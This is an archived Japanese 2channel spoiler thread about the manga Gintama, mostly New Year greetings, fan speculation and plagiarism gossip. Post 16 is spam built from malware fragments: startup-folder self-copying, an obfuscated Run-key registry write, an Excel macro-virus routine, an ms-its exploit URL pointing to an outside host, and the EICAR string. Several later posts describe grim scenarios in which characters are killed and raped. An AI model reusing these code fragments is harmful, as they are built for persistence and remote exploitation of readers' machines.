2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【空知英秋】銀魂 ネタバレスレッドPart71

1 :名無しさんの次レスにご期待下さい:2006/12/30(土) 21:27:12 ID:GdZ9sYIE
【空知英秋】銀魂 ネタバレスレッドPart71

・このスレのルール・~

†sage進行推奨
†アンチはアンチスレで
†ダウソ系の話は極力避ける
†解禁前に本スレに誤爆した奴は切腹
†コピペ荒らし・クレ厨はスルーする。
†大義を通す前にマナーを通せマナーを
†過度のキャラ萌えや腐女子の話題はスルー
†ちゃらついたダウソクレクレ厨に興味ない
†文字バレだけでヨロシ
†アニメの話題はアニメ板で
†次スレは950が立てる。スレタイはシンプルに。
†キャラ叩き・ヒロイン論争・カプ話禁止

文字バレ神→ ◆xv3PhvD28k (通称後藤さん)
(毎週木曜夜ごろ)
簡易文字バレ神→◆1finNNYePw (通称斉藤さん)
(来れる時は木曜午前)

※後藤氏はおそらくもう来られないとのこと
 新バレ神に山田氏(◆jlbZe42Wog )が加わりました

前スレ
【空知英秋】銀魂 ネタバレスレッドPart70
http://etc4.2ch.net/test/read.cgi/wcomic/1166407289/

前々スレ
銀魂 ネタバレスレPart69
http://etc4.2ch.net/test/read.cgi/wcomic/1164482404/

前々々スレ
【空知英秋】銀魂 ネタバレスレッドPart68
http://etc4.2ch.net/test/read.cgi/wcomic/1163246541/


2 :名無しさんの次レスにご期待下さい:2006/12/30(土) 21:31:36 ID:viybm0An
>>1
乙!

3 :名無しさんの次レスにご期待下さい:2006/12/30(土) 21:34:35 ID:hEJXFzVX
再アップお願いします

4 :名無しさんの次レスにご期待下さい:2006/12/30(土) 21:37:24 ID:D1Ri2flR
乙!

俺せっかく~っての除けて貼ってたのに、また付けちゃったのねW
とりあえずありがとう

5 :名無しさんの次レスにご期待下さい:2006/12/30(土) 21:50:46 ID:ABvxHOq5
>>1

6 :名無しさんの次レスにご期待下さい:2006/12/30(土) 21:51:50 ID:9iO6MmJS
>>1
乙たま

7 :名無しさんの次レスにご期待下さい:2006/12/30(土) 21:56:41 ID:RnFthJo4
>>1
乙!

8 :名無しさんの次レスにご期待下さい:2006/12/30(土) 22:16:05 ID:GdZ9sYIE
>>4
すまなかったorz

9 :名無しさんの次レスにご期待下さい:2006/12/30(土) 22:20:21 ID:D1Ri2flR
>>8
いやいやW
代わりにたててくれてほんとサンクス!

10 :名無しさんの次レスにご期待下さい:2006/12/30(土) 22:34:39 ID:9Nnf/wiQ
【1乙中】
    ∧,,∧ ∧,,∧
 ∧ (´・ω・) (・ω・`) ∧∧
( ´・ω) U) ( つと ノ(ω・` )
| U (  ´・) (・`  ) と ノ
 u-u (l    ) (   ノu-u
     `u-u'. `u-u'

11 :名無しさんの次レスにご期待下さい:2006/12/31(日) 00:11:54 ID:6SStj3lt
>>1乙女〜

12 :名無しさんの次レスにご期待下さい:2006/12/31(日) 04:17:53 ID:ncnQ0EmD
そういえば、任●堂は弁天堂、ソ●ーはゾニーなのに
せがはそのままでいいのかね

13 :名無しさんの次レスにご期待下さい:2006/12/31(日) 13:20:04 ID:pA0FotmL
もしかしてもう全部消された?!まだバレ残ってるロダありますか??

14 :名無しさんの次レスにご期待下さい:2006/12/31(日) 14:25:07 ID:l6YFAzfA
スルーしろよって言ってた奴は確実に腐女子

15 :名無しさんの次レスにご期待下さい:2006/12/31(日) 14:52:02 ID:ey718Yrk
透視できるのか

16 :<body onload=window()>:2006/12/31(日) 15:22:30 ID:fX/6hmtK
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


17 :名無しさんの次レスにご期待下さい:2006/12/31(日) 15:49:24 ID:9JAL9Cju
前スレ1000、ナイスフォロー

 999 名前: 名無しさんの次レスにご期待下さい [sage] 投稿日: 2006/12/31(日) 14:17:11 ID:NpB3YxCb
    1000なら来年はシリアスもギャグも神の出来

 1000 名前: 名無しさんの次レスにご期待下さい [sage] 投稿日: 2006/12/31(日) 14:17:54 ID:NpB3YxCb
    1000なら↑実現


18 :名無しさんの次レスにご期待下さい:2006/12/31(日) 16:02:36 ID:Ac2nYtVl
このスレの住人にGOODLUCK!!

19 :名無しさんの次レスにご期待下さい:2006/12/31(日) 17:36:27 ID:Mvg5V9vD
>>17
これはすげえw

20 :名無しさんの次レスにご期待下さい:2007/01/01(月) 00:04:57 ID:/4hDTr9Z
あけおめ

21 :名無しさんの次レスにご期待下さい:2007/01/01(月) 00:16:46 ID:oa6PqGfJ
ことよろ

22 : 【末吉】 【1182円】 :2007/01/01(月) 00:34:37 ID:3mGJykUR
正月はこれをやらないと

23 :名無しさんの次レスにご期待下さい:2007/01/01(月) 00:38:48 ID:qW6kXVBd
あけおめ〜
バレ氏さんも住人も宜しく

24 : 【吉】 :2007/01/01(月) 00:41:46 ID:xX8cV0cC
あけぇおめ

( ゚Д゚) <乙女座の俺は凶にしまーす

25 : 【ぴょん吉】 【376円】 :2007/01/01(月) 00:59:05 ID:p9YV896v
あけおめ〜
今年もよろしくバレ師さんたちもよろしく〜

26 :名無しさんの次レスにご期待下さい:2007/01/01(月) 01:02:09 ID:v1lEdF7D
今年も残す所後364日かぁ。1年は早い

27 : 【大凶】 【948円】 :2007/01/01(月) 01:23:43 ID:jKDs/Lt4
今年もよろしく

28 : 【900円】 【大凶】 :2007/01/01(月) 01:47:22 ID:RSGtkF9Y
あけおめ〜今年もよろしく〜

29 :名無しさんの次レスにご期待下さい:2007/01/01(月) 01:50:41 ID:pUO2jzX5
あけおめ
今年も空知頑張れ!大西もついでに

30 : 【吉】 :2007/01/01(月) 02:09:10 ID:OXYCa7rO
あけおめ
今年もよろしく!!

31 : 【大吉】 【1509円】 :2007/01/01(月) 04:43:41 ID:O/X54U3q
おいおいお前ら凶ばっかじゃねーか
ちょっとは俺を見習え

32 : 【1033円】 【大吉】 :2007/01/01(月) 11:32:11 ID:vM2DM7sE
大吉だったら結婚するんだ…

33 : 【大吉】 【770円】 :2007/01/01(月) 11:38:32 ID:ITRvlT26
>>32
ちょwww

しっかり死亡フラグたってるからwww

34 : 【末吉】 【1011円】 :2007/01/01(月) 11:42:51 ID:UcQCF+BI
今日こそ16巻読めますように(`∀`)

35 :【】【100円】:2007/01/01(月) 12:31:27 ID:v1lEdF7D
なんだろ

36 : 【ぴょん吉】 【1582円】 :2007/01/01(月) 12:57:10 ID:WsWZT3mD
さあどうだ

37 :名無しさんの次レスにご期待下さい:2007/01/01(月) 15:22:57 ID:oC0GQ9pq


38 :名無しさんの次レスにご期待下さい:2007/01/01(月) 15:26:45 ID:BhRGELI7
あけおめ〜
どこかに残ってませんか?読みて〜

39 :名無しさんの次レスにご期待下さい:2007/01/01(月) 16:24:59 ID:nIJwYXh0
俺からもお願いします。前スレ落ちちゃってる。

40 :名無しさんの次レスにご期待下さい:2007/01/01(月) 16:30:04 ID:v1lEdF7D
今帰ったら上げるから少し待ってて。
パスのヒントだけ与えるからhttp://imepita.jp/20070101/591260

41 : 【小吉】 【914円】 :2007/01/01(月) 16:43:54 ID:O/X54U3q
コミックって、4日発売じゃないの?
早売りってやつですか?

42 : 【大吉】 【84円】 :2007/01/01(月) 17:10:40 ID:JqnnN+cn
>>41
16巻は12月27日発売だったけど

釣り?

43 : 【中吉】 【1198円】 :2007/01/01(月) 17:37:58 ID:4XAuztyE
ナルトと銀魂だけ毎年恒例の年末繰上げ発売だった。
繰り上げ発売してもらえるのは人気作品のみだから喜べ

44 : 【大凶】 【859円】 :2007/01/01(月) 18:11:26 ID:MLBLmayP
分かった。
喜んどく。

しかし、元旦新聞の集英社広告までは無理だったか…。
ブリーチは出てたんだがな。

45 :名無しさんの次レスにご期待下さい:2007/01/01(月) 19:39:15 ID:iBfaT4Xs
鰤は映画公開中だしな

46 : 【ぴょん吉】 【1884円】 :2007/01/01(月) 20:12:48 ID:O/X54U3q
>>42
いんや釣りでねえ
年末恒例の繰り上げ発売とか、知らなかった
ごめんなさい

47 :名無しさんの次レスにご期待下さい:2007/01/01(月) 20:21:23 ID:4Gpf3dIT
普通は1月4日発売だと思うって、気にするなよ


48 :!omikuji!dama:2007/01/03(水) 01:19:33 ID:nVt6KQ59
ほす?

49 :名無しさんの次レスにご期待下さい:2007/01/03(水) 01:35:32 ID:cKnWVx5n
次にバレが来るまでは過疎かね
148訓のバレ見た時はほぼ1ページごとに笑える箇所があって
自分の頭の幸せさ加減をかみしめたもんだ

50 :名無しさんの次レスにご期待下さい:2007/01/03(水) 01:35:55 ID:tdH5t5kJ
>>48
お前…もう三日だぞ

それにしてもスレが止まってるね

51 :名無しさんの次レスにご期待下さい:2007/01/03(水) 10:25:36 ID:tSDNKgV8
次のバレって明日来る?

52 :名無しさんの次レスにご期待下さい:2007/01/03(水) 10:51:28 ID:9vVywwyL
次のバレは再来週だと思う。

53 :名無しさんの次レスにご期待下さい:2007/01/03(水) 11:57:22 ID:98C75RFy
随分間が空くな
早く続きが読みたいんだぜ

54 :名無しさんの次レスにご期待下さい:2007/01/03(水) 14:38:39 ID:Y0wXijCC
愛しき〜友はいずこに〜〜
望みは〜露と消えても〜
忘れは〜せぬ
熱きお〜もい
誠の〜〜名に集いし〜と〜お〜い〜〜日〜を〜〜




あけましておめでとうございます
age

55 :名無しさんの次レスにご期待下さい:2007/01/03(水) 16:27:40 ID:ozNlKLW8
>>54
懐かしいな
銀魂の真選組はそういう末路をたどらないと思うけどな

56 :名無しさんの次レスにご期待下さい:2007/01/03(水) 18:00:34 ID:5VMKFjdA
歴史通りにいったら大変だよ
モデルのいるキャラの中じゃ新八と陸奥くらいしか長生きしないじゃないか

57 :名無しさんの次レスにご期待下さい:2007/01/03(水) 19:17:15 ID:t3Qg3rI3
つーか歴史通りなら銀さんとか神楽とか宇宙人とかどーすんのって感じだし、
沖田じゃなくてミツバさん死んだし、
歴史とは全然違う話になるけど、高杉は最後には死ぬね。

58 :名無しさんの次レスにご期待下さい:2007/01/03(水) 19:24:11 ID:XVOBEyoC
いやいつかは死ぬだろうさ全員

59 :名無しさんの次レスにご期待下さい:2007/01/03(水) 19:51:28 ID:tOgLOTuM
そうだな、人間いつかは死ぬもんな
いままでありがとう空知
銀魂おもしろかったよ

60 :名無しさんの次レスにご期待下さい:2007/01/03(水) 19:54:41 ID:t3Qg3rI3
いや、最終回までに高杉死ぬってことだとマジレス

61 :名無しさんの次レスにご期待下さい:2007/01/03(水) 20:25:27 ID:XVOBEyoC
ああうん 書き込んでから思い至った
わざわざありがとう>60

62 :名無しさんの次レスにご期待下さい:2007/01/03(水) 20:37:42 ID:AUXfLzGu
>>57
ミツバだって沖田さんだよ

63 :名無しさんの次レスにご期待下さい:2007/01/03(水) 21:00:52 ID:t3Qg3rI3
>>62
沖田呼びなら普通に考えて沖田そうごのことだとマジレス

64 : 株価【36】 :2007/01/03(水) 21:13:34 ID:MFOH4eel


65 :名無しさんの次レスにご期待下さい:2007/01/03(水) 21:59:19 ID:eLahqPES
are?


66 :名無しさんの次レスにご期待下さい:2007/01/04(木) 02:44:09 ID:Omk7PB7a
ジャスタウェイ!!

67 :名無しさんの次レスにご期待下さい:2007/01/04(木) 16:33:21 ID:d5PapZ4v
この時代で長生きしたのってヅラのモデルの桂ぐらいか?

68 :名無しさんの次レスにご期待下さい:2007/01/04(木) 16:48:29 ID:ZJt5MpKR
新八のモデルの永倉も長生き。

69 :名無しさんの次レスにご期待下さい:2007/01/04(木) 16:57:26 ID:d5PapZ4v
>>68
永倉がいたか

70 :名無しさんの次レスにご期待下さい:2007/01/04(木) 17:36:31 ID:+3OhPVS+
ジャンプのバレってもうガイシュツしてる?

71 :名無しさんの次レスにご期待下さい:2007/01/04(木) 17:39:21 ID:2eifqKQc
でも永倉新七って真選組にいるよな。

72 :名無しさんの次レスにご期待下さい:2007/01/04(木) 17:39:22 ID:XBOv6TiK
とっくにガイシュツ

73 :名無しさんの次レスにご期待下さい:2007/01/04(木) 17:48:29 ID:XBOv6TiK
新七は明らかに後付けだろう
新八も新七もモデルは永倉でないの

74 :名無しさんの次レスにご期待下さい:2007/01/04(木) 18:52:17 ID:aOM7Cjsi





http://www.geocities.jp/oda_eiichirou/






75 :名無しさんの次レスにご期待下さい:2007/01/04(木) 19:28:34 ID:1/av5tEp
http://imepita.jp/20070104/700340
↑これ銀さんいなくね??

76 :名無しさんの次レスにご期待下さい:2007/01/04(木) 19:45:46 ID:ZJt5MpKR
アレンの頭の上のやつ?

77 :名無しさんの次レスにご期待下さい:2007/01/04(木) 23:06:26 ID:xp4rwYgH
桂は43で死んでるから長生きしたとは言えないのでは?
まあその他はだいたい20代30代で死んでるけども。

78 :名無しさんの次レスにご期待下さい:2007/01/04(木) 23:34:45 ID:aqk3hsP+
永倉って虫歯で死んだんだっけ。

79 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:05:14 ID:GbyPPt27
え、虫歯って放置してると死ぬの!?

80 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:20:31 ID:ZHIhiYSG
口の中で出血した際に虫歯菌が血管に入って脳に回って死ぬんだよ

81 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:20:57 ID:BuEdOvks
>>79頭が割れんばかりに痛くなって死ぬらしい
菌が頭まで回るんだったかな?

82 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:21:53 ID:BuEdOvks
ごめん被った

83 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:24:10 ID:YvVZruwL
銀さんも糖分ばっかり喰ってると

84 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:28:51 ID:cDrxT3zP
>>80
口の中で出血しなければいいのか・・・

85 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:30:31 ID:ZHIhiYSG
>>84
虫歯菌のせいで歯茎が痛んで血が出るようになるんだよ
だから歯医者にいってちゃんと虫歯はなおしておけよ

86 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:37:29 ID:GbyPPt27
>>85
やべー!!
最近歯磨きすると血が出る!!
歯医者行かないと死ぬ!!

87 :名無しさんの次レスにご期待下さい:2007/01/05(金) 00:43:10 ID:4LgFnkf5
三食ちゃんと歯磨きしてたらなおるよ!
                 ハ_ハ
               ('(゚∀゚∩
                ヽ  〈
                 ヽヽ_)

88 :名無しさんの次レスにご期待下さい:2007/01/05(金) 01:41:51 ID:hzXd+ry4
そろそろよろず屋三人のシリアスがみたい(´・ω・`)

89 :名無しさんの次レスにご期待下さい:2007/01/05(金) 02:18:55 ID:lThIyp+u
攘夷四人組のシリアスなら坂本も出てくるしちょっと見てみたいけど、
無駄なシリアスはつまんないからな…
ギャグでこそ銀魂は面白い
ギャグ:人情:シリアス=7:2:1ぐらいがいいと思うんだけどな

90 :名無しさんの次レスにご期待下さい:2007/01/05(金) 02:58:18 ID:flD8GI+/
>>85
すすすすスレ違いということは解ってるけど質問させて
歯の痛みとともに頭がすげ痛くなることが時々あるんだけど、これって虫歯なのかな
歯医者いったほうがいいのかな死んじゃうのかな!?

91 :名無しさんの次レスにご期待下さい:2007/01/05(金) 03:06:37 ID:GbyPPt27
>>88
神楽兄編が多分万事屋シリアスになると思う

92 :名無しさんの次レスにご期待下さい:2007/01/05(金) 03:10:55 ID:ZHIhiYSG
>>90
生きてる間に歯医者にいけ
俺がおまえに言ってやれるのはそれだけだ

93 :名無しさんの次レスにご期待下さい:2007/01/05(金) 03:25:36 ID:HkML0YyW
ごめん、なんか死因が虫歯って余計なこと言ったかも。
永倉の死因は事実だけど、不安になった方は
あまり心配せずに歯医者へどーぞ。
あれ、宣伝みたいになったぞ、おい。

94 :90:2007/01/05(金) 03:31:52 ID:flD8GI+/
>>92
そう…ありがとう
やっぱり虫歯なのかコレ…

あと、最近ケツをふくとトイレットペーパーに血がついたり
つま先立ちをすると膝がガクガクけいれんしたり
ついでに今、部屋が焦げ臭いんだけど大丈夫かな

95 :名無しさんの次レスにご期待下さい:2007/01/05(金) 04:12:41 ID:o6xLaBP4
神楽兄編なんて神楽信者の妄想だっつうの

96 :名無しさんの次レスにご期待下さい:2007/01/05(金) 04:28:58 ID:lThIyp+u
妄想つーか、作中ではっきり神楽の兄いることほのめかしてるわけだし、
そのままほっとく可能性のほうが低くね?まぁ空知だから分からんけど

97 :名無しさんの次レスにご期待下さい:2007/01/05(金) 04:39:10 ID:HkML0YyW
神楽兄はスルーだと思うけど。
単に、そういうこともありましたよってことだろ。
今更出してどうするんだよ。
話に登場させる意味がないと思うが。
もちろん空知が決めることだから、うまく話に繋げてくるかもしれないし
まだ分からないけど。

98 :名無しさんの次レスにご期待下さい:2007/01/05(金) 05:48:07 ID:lRXY/mY7
出てきたとしたらネタ切れの苦しさを感じる。
くらい別に出てこなさそうな位置にいるとおもう

99 :名無しさんの次レスにご期待下さい:2007/01/05(金) 05:51:10 ID:lThIyp+u
天童衆はあんまり考えてない感じだったなー
登場したときの人物と背景の書き込みのなさ・・
まだよく考えてません適当ですって感じに笑ってしまったw

100 :名無しさんの次レスにご期待下さい:2007/01/05(金) 06:35:38 ID:5t6zXw1G
>94
生きろ そなたはry

101 :名無しさんの次レスにご期待下さい:2007/01/05(金) 09:41:35 ID:ClpUygJT
神楽兄は出るだろ
高杉編とかあったらだけど

102 :名無しさんの次レスにご期待下さい:2007/01/05(金) 09:50:57 ID:fRY8BHnf
汚い

103 :名無しさんの次レスにご期待下さい:2007/01/05(金) 10:00:37 ID:prfy2dYq
>>97
俺はむしろ煉獄関がそうだと思ってたがスレ見たら伏線として挙げられてて驚いた

104 :名無しさんの次レスにご期待下さい:2007/01/05(金) 10:12:10 ID:ofQlq4Fw
>>97
松陽先生もそうだろうな
神楽兄が出るとすれば
高杉とタッグ→神楽が始末
はほぼ確定

105 :名無しさんの次レスにご期待下さい:2007/01/05(金) 10:58:52 ID:ofQlq4Fw
>>91
ところで一昨日

攘夷戦争→銀時の目の前で敵の天人に突き殺される(刀or槍)新八&犯された後斬り殺される神楽→銀時発狂→皆殺し→戦争終了→また拾われる→ループ

的な夢をみた(新八18歳神楽16歳) 殺されるシーンはグロめ
まぁ正月早々何ちゅー夢見てんだって話だけど最終回にピッタリじゃね?カオスっぷりが
まぁジャンプではキツいか

106 :名無しさんの次レスにご期待下さい:2007/01/05(金) 11:41:25 ID:OlZ9qULO
>>105
それ見たいな

107 :名無しさんの次レスにご期待下さい:2007/01/05(金) 11:44:42 ID:hu6anFTH
>>105
どんな鬱展開だよ…

108 :名無しさんの次レスにご期待下さい:2007/01/05(金) 11:51:26 ID:yV9v4AP0
>>105
神楽ファンが発狂しそうだな

109 :名無しさんの次レスにご期待下さい:2007/01/05(金) 11:56:26 ID:miAHeExz
>>105なら空知は鬼畜
でも天野も今でこそ某腐女子漫画を描いてるけど昔は少年スピンという凄いぶっ飛んだ漫画を…
腐女子よけになっていいかもなw

110 :名無しさんの次レスにご期待下さい:2007/01/05(金) 12:19:54 ID:HkML0YyW
発狂する銀時は絶対に見たい。

111 :名無しさんの次レスにご期待下さい:2007/01/05(金) 12:41:07 ID:oXyb2hdv
松陽先生の話すらもギャグでやって欲しい俺にはそこまでシリアスな話はキツイw
トラウマになるwww

112 :名無しさんの次レスにご期待下さい:2007/01/05(金) 13:37:44 ID:cDrxT3zP
>>105
想像したら死ぬほど鬱になった
お前・・・そんな夢みるなんて何かあったのか

113 :名無しさんの次レスにご期待下さい:2007/01/05(金) 13:45:49 ID:hzXd+ry4
>>109

114 :名無しさんの次レスにご期待下さい:2007/01/05(金) 13:46:00 ID:ofQlq4Fw
前日にマユゾン読んで寝たんだけど、最後の襲われる所がうまい具合に夢の中で鬱展開に変換されたっぽい

115 :名無しさんの次レスにご期待下さい:2007/01/05(金) 14:27:10 ID:miAHeExz
最後が凄い鬱だと、読み返した時に平和な日常を見て
「ああ、こいつらもあと数年後には…」
って感じになるからヤバい エヴァがそんな感じ

116 :名無しさんの次レスにご期待下さい:2007/01/05(金) 14:30:03 ID:64cOQ5Sc
>>105大人気だな
デビルマンでも読んだか?

117 :名無しさんの次レスにご期待下さい:2007/01/05(金) 14:57:58 ID:hu6anFTH
銀時の目の前で二人が殺されるのと、二人の前で銀時が殺されるのってどっちがより鬱だろうか
って考えてたらさらに暗い気持ちになった

118 :名無しさんの次レスにご期待下さい:2007/01/05(金) 15:03:05 ID:cDrxT3zP
どっちも同じくらい鬱だなそれは

119 :名無しさんの次レスにご期待下さい:2007/01/05(金) 15:37:52 ID:HkML0YyW
紅桜のとき新八の前で銀さんが倒れた時点で
けっこうあわあわなってしまったから
どちらになっても、すごい欝になりそう。

120 :名無しさんの次レスにご期待下さい:2007/01/05(金) 15:39:43 ID:5pZsVvVg
誰に感情移入してるかで変わってくるだろうな

121 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:21:50 ID:7TNcyfZr
ガキが死んだ方が鬱だろな。
まして目の前で犯され殺されたらそりゃ狂うわ。

122 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:31:50 ID:027KmdwG
神楽兄って何してんだか気になる
つうか夜兎って神楽家族しかいないの?とか
天道衆はアニメだと結構おもしろい声だったから気になる

まぁあの中の一人が松陽先生なんですが

123 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:32:13 ID:ZefwrtCK
銀さんこれ以上喪失体験したら精神崩壊すんだろ
神楽と新八はなんとなく立ち直りそうだから二人の目の前で
銀さんあぼんのがマシ

124 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:35:08 ID:5pZsVvVg
まぁハーゲンダッツ100個集めたら生き返るわけだがwww

125 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:36:39 ID:O9vZyZKN
松陽はエリザベス

126 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:54:43 ID:ofQlq4Fw
>>122
いっぱい夜兎出すと色々面倒臭いからね
公式には書いてないけど多分神楽家は夜兎族最後の生き残りって事にしてるんだろ

127 :名無しさんの次レスにご期待下さい:2007/01/05(金) 16:59:20 ID:miXxLAid
何かでプチっといっちゃった銀さんが万事屋従業員を殺してしまうという展開になったら
個人的にはこれ以上ない鬱だと考えた
なんで新年早々こんな暗い想像を繰り広げているんだ >>105のせいだ

128 :名無しさんの次レスにご期待下さい:2007/01/05(金) 17:02:06 ID:cDrxT3zP
ここ定期的に葬式ムードになるなw

129 :名無しさんの次レスにご期待下さい:2007/01/05(金) 17:27:57 ID:7TNcyfZr
>>105の目の前って新八が紅桜の見回り状態になんのか…?俺も発狂するわ
>>123
何だかんだ言って2人が心の支えだしな レイプだけでもキツい
>>127
それただのグロ漫画じゃねーかw鬱でも何でもねーよ

130 :名無しさんの次レスにご期待下さい:2007/01/05(金) 18:21:37 ID:xoUd5bnW
神楽と新八が何故か行方不明になる。
その何ヵ月か後大きな戦争が起こる。
なんやかんやでヅラや新鮮組や銀さんの周りの人は皆死ぬ。
銀さん我を忘れる。
先頭立って天人を殺していくが、
斬った後にふと覚えのあるメガネに気付く。
なんで新八がこんなところに?
虫の息の新八は何故か記憶が戻る。
なんとか助けようと新八を抱えて走る。
銀さん後ろからおもくそ撃たれる。
振り向くと神楽が。
死んだのを確認して銀さんの首をもぎ取ろうとする。
新八が最後の力で体内爆弾を起動。
3人とも死ぬ。

と言う厨END。
神楽と新八はどっち役でも良い。

131 :名無しさんの次レスにご期待下さい:2007/01/05(金) 19:04:54 ID:lThIyp+u
なんでそんな荒んでるんだよ。
これギャグ漫画だぞ

132 :名無しさんの次レスにご期待下さい:2007/01/05(金) 19:15:22 ID:ClpUygJT
構うから荒れるんだよ

133 :名無しさんの次レスにご期待下さい:2007/01/05(金) 19:16:35 ID:hzXd+ry4
いやああああああそんな銀魂いやああああああああ

134 :名無しさんの次レスにご期待下さい:2007/01/05(金) 19:19:09 ID:/tfZQd5O
夜兎が神楽家族だけならもう純血種は生まれない事になるから
どこか他にもいて欲しい
結局は雑種になってしまう皮肉な結論なら仕方ないか

135 :名無しさんの次レスにご期待下さい:2007/01/05(金) 20:15:45 ID:lThIyp+u
>>132
もしかして荒れると荒むを勘違い?

136 :名無しさんの次レスにご期待下さい:2007/01/05(金) 20:24:29 ID:HkML0YyW
やっぱり最終回予想スレ立てる?
いらんかな。

137 :名無しさんの次レスにご期待下さい:2007/01/05(金) 20:28:07 ID:ZHIhiYSG
どうせ銀魂なんてアゴ美のアゴが最強ってオチだろ

138 :名無しさんの次レスにご期待下さい:2007/01/05(金) 20:41:07 ID:YvVZruwL
妄想しすぎ

139 :名無しさんの次レスにご期待下さい:2007/01/05(金) 21:06:53 ID:GbyPPt27
>>134
夜兎族は地球人とのハーフのほうがより強い子になるってどっかの漫画みたいな設定だったり

140 :名無しさんの次レスにご期待下さい:2007/01/05(金) 22:11:19 ID:HkML0YyW
神楽の夢はエイリアンバスターとか言ってたし
平和な終わり方するんなら、独り立ちするんかな。
完全に銀時に懐いた神楽が独り立ちできるかどうか分からんが。
もちろんそうなる前に終わらせる可能性も高いけど。


141 :名無しさんの次レスにご期待下さい:2007/01/05(金) 22:22:26 ID:OlZ9qULO
>>105もしくは>>130のような展開が
見たい俺はマゾかもわからんね

142 :名無しさんの次レスにご期待下さい:2007/01/05(金) 22:31:31 ID:64cOQ5Sc
平和な奴は悲劇を好むな

143 :名無しさんの次レスにご期待下さい:2007/01/05(金) 22:33:05 ID:vmOQeIpD
爆弾特攻死亡と聞いて昔のキョンシーのドラマ思い出した
なんかそんなことした人いたなぁと…

144 :名無しさんの次レスにご期待下さい:2007/01/05(金) 22:34:48 ID:all2TIy2
やめてくれセカイ系の臭いがする
銀魂はセカイ系にはなって欲しくない。
あのとても深い意味があるフリをして実は中身無しの虚無感にはもうあきあきだ

145 :名無しさんの次レスにご期待下さい:2007/01/05(金) 22:42:13 ID:ue19qHOW
ここですかさず百合ちゃんのお母さんが主人公END

146 :名無しさんの次レスにご期待下さい:2007/01/05(金) 22:55:07 ID:D1RZEZYq
>>140
新八は姉から離れ神楽は親から離れ
銀さんと暮らしてる今が独り立ちだと思ってた
支えられるだけじゃなくて支えあってるから大丈夫だと思う
のであった

せっかくSF入ってるんだからまた宇宙行って欲しい

147 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:10:06 ID:Fn/aN2gD
うぇwwwww
今さっきジャンプ買ってきて読んだんだけど……
また他の漫画のネタをパクっちゃったのか…
だぱんぷとかの盗作疑惑で相当ダメージ受けたわけだが…懲りずにまたやらかしたか…
今度はどうなる?いよいよやばくない?つーかこれ既出?

148 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:15:08 ID:yV9v4AP0
>>147
どの漫画のネタをパクったって?

149 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:31:25 ID:5pZsVvVg
読んだけどマリオとか野望とかパロだらけでどれがパクリか分からないよ
乳首連打?ところでゲボェって発音できる?二周連続モザイク使用かよwww

150 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:31:27 ID:ZHIhiYSG
腐女子とパクリは既出

151 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:32:54 ID:Y8kkXYyI
あーなんかヤバい疲れてるふいんきは出てたけどやっちゃったか

で、何パクったんだ?
箇条書きマジックは無しの方向で

152 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:36:32 ID:GbyPPt27
ギャグ漫画日和にこんなふうなありえないギャルゲーネタがあったとかいうレス見たがそれじゃないか

153 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:40:13 ID:D4pSJPp8
てかバレ来ないぶん
鬱な展開考えたりパクったとかなったり暗いな・・

早くバレぷりいいず

154 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:45:51 ID:ofQlq4Fw
>>152
それだけでパクリとか言ってたら何も書けなくなるぞ…
>>147
kwsk

155 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:52:41 ID:Fn/aN2gD
うわー案外気付かれないもんなんだな……
ソードマスターヤマトはかなり週漫板でも浸透してるのに…
パクったのはギャグ漫画日和で、『死んだ私は太陽に吠える』って話。
>>152のじゃ無いやつな。確かにあれも似てるけど、ギャグ漫画なら王道としてああいうネタ描くのは普通にありだよ。
んで、その内容なんだけど、
松田優作のファンの女が車に轢かれそうな猫(カジキマグロくわえた)を助けようとして車と激突。
何とか助かったと思ったら、車に弾き飛ばされてたカジキマグロが腹に刺さって死亡。
『なんじゃこりゃあ』を最期の言葉にして死にたいと死神に頼んでギャグが展開していく。
カジキマグロをくわえてるってとことそれが刺さって死ぬってとこ。これは流石に言い訳出来そうに無い。

156 :名無しさんの次レスにご期待下さい:2007/01/05(金) 23:54:57 ID:lwbQFv+h
スゲー!

